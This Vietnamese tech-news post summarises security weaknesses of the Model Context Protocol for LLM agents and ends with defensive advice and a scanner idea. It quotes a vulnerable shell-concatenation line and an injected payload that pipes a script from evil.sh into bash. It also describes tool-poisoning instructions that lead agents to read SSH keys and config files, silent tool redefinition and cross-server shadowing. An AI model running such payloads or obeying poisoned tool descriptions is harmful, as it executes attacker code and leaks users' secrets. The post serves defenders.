2 điểm bởi GN⁺ 2025-04-07 | Chưa có bình luận nào. | Chia sẻ qua WhatsApp
  • Model Context Protocol (MCP) đang được chú ý như một tiêu chuẩn kết nối các tác nhân LLM như Claude, GPT và Cursor với công cụ và dữ liệu, nhưng mô hình bảo mật mặc định còn yếu nên bản thân việc triển khai có thể làm mở rộng bề mặt tấn công
  • Đổi lại cho việc kết nối API tiêu chuẩn, phiên duy trì liên tục, thực thi lệnh và chia sẻ ngữ cảnh trở nên thuận tiện hơn, việc kết nối tới máy chủ tùy ý có thể trở thành đường vòng dẫn tới shell, secret và hạ tầng
  • Trong thử nghiệm của Equixly, hơn 43% các triển khai máy chủ MCP có chứa lệnh gọi shell không an toàn, còn Invariant Labs đề cập đến Tool Poisoning Attack, nơi chỉ dẫn độc hại được giấu trong mô tả công cụ
  • MCP còn thiếu tiêu chuẩn xác thực, mã hóa ngữ cảnh và xác minh tính toàn vẹn của công cụ, đồng thời người dùng khó có thể thấy toàn bộ chỉ dẫn công cụ mà tác nhân thực sự đọc
  • Nhà phát triển cần xác thực đầu vào và cố định phiên bản, nền tảng cần hiển thị metadata và hash toàn vẹn, còn người dùng cần tránh kết nối tới máy chủ tùy ý và theo dõi các bản cập nhật công cụ bất thường

Vì sao MCP trở thành bề mặt tấn công

  • MCP (Model Context Protocol) là một tiêu chuẩn mới cho cách LLM tích hợp với công cụ và dữ liệu, được gọi là “USB-C cho tác nhân AI”
  • Thông qua MCP, tác nhân có thể xử lý nhiều tác vụ theo cách tiêu chuẩn hóa
    • Kết nối tới công cụ bằng API tiêu chuẩn hóa
    • Duy trì phiên liên tục
    • Thực thi lệnh
    • Chia sẻ ngữ cảnh giữa các workflow
  • Vấn đề cốt lõi là MCP không cung cấp mô hình bảo mật mặc định
    • Nếu kết nối tác nhân tới một máy chủ MCP tùy ý, có thể phát sinh kênh phụ dẫn tới shell, secret và hạ tầng

Các kiểu tấn công đã được nêu ra

  • Lỗ hổng chèn lệnh

    • Trong thử nghiệm của Equixly, hơn 43% các triển khai máy chủ MCP có chứa lệnh gọi shell không an toàn
    • Đoạn mã ví dụ nối trực tiếp đầu vào người dùng vào lệnh shell như os.system("notify-send " + notification_info['msg'])
    • Nếu kẻ tấn công chèn payload như "; curl evil.sh | bash" vào tham số công cụ MCP, có thể dẫn tới thực thi mã từ xa thông qua một tác nhân đáng tin cậy
  • Tool Poisoning Attack

    • Cuộc tấn công được Invariant Labs đề cập giấu chỉ dẫn độc hại trong mô tả công cụ MCP
    • Phần mô tả này không hiện ra với người dùng nhưng lại được cung cấp nguyên vẹn cho AI
    • Công cụ ví dụ trông như một hàm cộng hai số, nhưng trong mô tả lại có chỉ dẫn đọc ~/.ssh/id_rsa~/.cursor/mcp.json
    • Các tác nhân như Cursor có thể làm theo những chỉ dẫn này
  • Silent Redefinition

    • Công cụ MCP có thể thay đổi định nghĩa của chính nó sau khi được cài đặt
    • Dù người dùng đã phê duyệt một công cụ có vẻ an toàn ở ngày đầu, về sau nó có thể âm thầm đổi sang hành vi gửi khóa API cho kẻ tấn công
    • Có thể xem đây là một vấn đề chuỗi cung ứng đã đi thẳng vào bên trong LLM
  • Cross-Server Tool Shadowing

    • Khi nhiều máy chủ cùng được kết nối với một tác nhân, máy chủ độc hại có thể ghi đè hoặc chặn các lệnh gọi vốn hướng tới máy chủ đáng tin cậy
    • Các kết quả có thể xảy ra gồm
      • Gửi email tưởng như gửi cho người dùng nhưng thực chất chuyển cho kẻ tấn công
      • Chèn logic bí mật vào các công cụ không liên quan
      • Mã hóa việc rò rỉ dữ liệu thông qua các tham số khó bị phát hiện

Các lớp bảo vệ còn thiếu và cách ứng phó theo từng vai trò

  • Ưu tiên hiện tại của MCP nghiêng về tích hợp dễ dàng và giao diện hợp nhất, trong khi còn thiếu các tính năng bảo mật sau
    • Không có tiêu chuẩn xác thực
    • Không có mã hóa ngữ cảnh
    • Không có phương thức xác minh tính toàn vẹn của công cụ
  • Người dùng không thể kiểm tra toàn bộ chỉ dẫn công cụ mà tác nhân nhìn thấy, và cũng không có cơ chế để xác minh rằng “công cụ này chưa bị chỉnh sửa”
  • Nhà phát triển

    • Dùng xác thực đầu vào
    • Cố định phiên bản máy chủ MCP và công cụ
    • Làm sạch mô tả công cụ
  • Nhà xây dựng nền tảng

    • Hiển thị đầy đủ metadata của công cụ
    • Dùng hash toàn vẹn cho các bản cập nhật máy chủ
    • Bắt buộc bảo mật phiên
  • Người dùng

    • Không kết nối tới máy chủ tùy ý
    • Giám sát hành vi phiên như giám sát log production
    • Theo dõi các bản cập nhật công cụ bất thường

Ý tưởng ScanMCP.com

  • ScanMCP.com có thể bao gồm trình quét và dashboard để kiểm tra các công cụ MCP đã kết nối
  • Những nội dung được hiển thị có thể gồm
    • Các rủi ro như RCE, đầu độc công cụ và rò rỉ phiên
    • Sự khác biệt giữa thông tin người dùng nhìn thấy và thông tin tác nhân nhìn thấy
  • Đối tượng phù hợp là đội bảo mật của các nền tảng tác nhân, các startup hạ tầng AI và các nhà xây dựng công cụ độc lập coi trọng độ tin cậy
  • MCP rất mạnh, nhưng trước khi có bộ giao thức bảo mật mặc định đầy đủ, vẫn cần các công cụ cung cấp khả năng quan sát và kiểm soát

Chưa có bình luận nào.

Chưa có bình luận nào.